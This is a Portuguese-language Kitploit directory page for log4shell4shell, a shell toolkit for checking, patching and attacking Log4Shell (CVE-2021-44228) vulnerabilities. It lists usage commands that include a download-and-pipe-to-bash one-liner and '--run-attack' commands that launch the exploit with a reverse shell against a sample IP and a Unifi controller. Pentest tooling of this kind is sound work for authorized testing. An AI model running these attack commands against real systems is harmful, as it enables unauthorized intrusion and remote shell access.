Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
log4shell4shell — Log4shell - Multi-Toolkit. Encontre, Corrija e Teste possíveis vulnerabilidades CVE-2021-44228 - fornece um ambiente completo de teste/ataque LOG4SHELL no shell | Kitploit
Ferramentas/GitHubGitHub/suuhm/log4shell4shell
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubsuuhm/log4shell4shell

log4shell4shell

Log4shell - Multi-Toolkit. Encontre, Corrija e Teste possíveis vulnerabilidades CVE-2021-44228 - fornece um ambiente completo de teste/ataque LOG4SHELL no shell

Ver Repositório
510há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

log4shell4shell

Log4j - Multiferramenta. Encontre e corrija possíveis vulnerabilidades CVE-2021-44228 - fornece um ambiente completo de teste/ataque LOG4SHELL

Thumb

Recursos

  • Verifique seu sistema Linux/Mac/BSD e Windows quanto a vulnerabilidades CVE-2021-44228
  • Corrija seu sistema excluindo a classe Java log4j / ou definindo algumas variáveis de ambiente
  • Prova de Conceito: você pode executar um servidor spring boot dummy para testar o exploit por conta própria (https://github.com/christophetd/log4shell-vulnerable-app)
  • Você pode executar um ataque contra um IP-Porta desejado e incluir um Comando Base64 / Ou um Reverse Shell simples
  • Varredura completa de faixa de IP por https://github.com/fullhunt/log4j-scan

Como Executar no Linux/Mac/BSD:

Requisitos:

  • https://docs.docker.com/get-docker/
  • Debian / Ubuntu: apt update ; apt install default-jre screen python3-pip bash curl
  • OpenSuse: zypper ref ; zypper in default-jre screen python3-pip bash curl
  • Redhead-Linux / CentOS: yum clean; yum install default-jre screen python3-pip bash curl
  • BSD pkg: pkg install default-jre screen python3-pip curl
  • Mac OS (Brew): /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pip

Verifique rapidamente seu sistema com este comando de uma linha:

wget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system

Mais Opções

Execute um ataque de exemplo contra IP: 10.4.4.20 Porta 8080 página de login e adicionalmente um Reverse Proxy Shell:

git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e

Execute screen -r l4s4s-ldap-srv e/ou screen -r l4s4s-nc-rsh para visualizar algumas informações de ataque no shell do Servidor de Exploit:

Execute uma varredura completa IP: 10.4.4.20 Porta 8080 e adicionalmente tente todos os testes:

./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"

Execute uma Prova de Conceito em um Servidor Tomcat Springboot:

./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e

Execute um Ataque/Verificação de Exploit do Unifi-Controller (em 10.4.4.20:8443):

./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post

Todas as Opções Disponíveis

_|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|
_|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|
_|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|
_|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|
_|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|
                          _|
                      _|_|


 > Executando Log4shell Framework & Check-Toolkit no shell v0.1a (C) 2021 suuhm

Entrada incorreta! Por favor, insira uma destas opções:

Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>

                        --get-powershell-finder
                        --check-system
                        --fix-log4j
                        --run-dummy-server <JNDIExploit.*.zip>
                        --run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
                        --python-scan <command>

Como atualizar sua versão do python no linux e/ou macos:

Basta executar meu script auxiliar (--list-versions): ./python-upgrader.sh

Como executar no Windows x86 / x64:

Basta executar no Powershell (modo administrador): .\set_windows_fix.ps1

Este script é alfa! Então, por favor, me informe se tiver algum problema

Aviso Legal

O projeto log4shell4shell é feito apenas para fins educacionais e de teste ético. O uso do log4j-scan para atacar alvos sem consentimento mútuo prévio é ilegal. É de responsabilidade do usuário final obedecer todas as leis locais, estaduais e federais aplicáveis. Os desenvolvedores não assumem nenhuma responsabilidade e não se responsabilizam por qualquer uso indevido ou dano causado por este programa.

Baixar ferramenta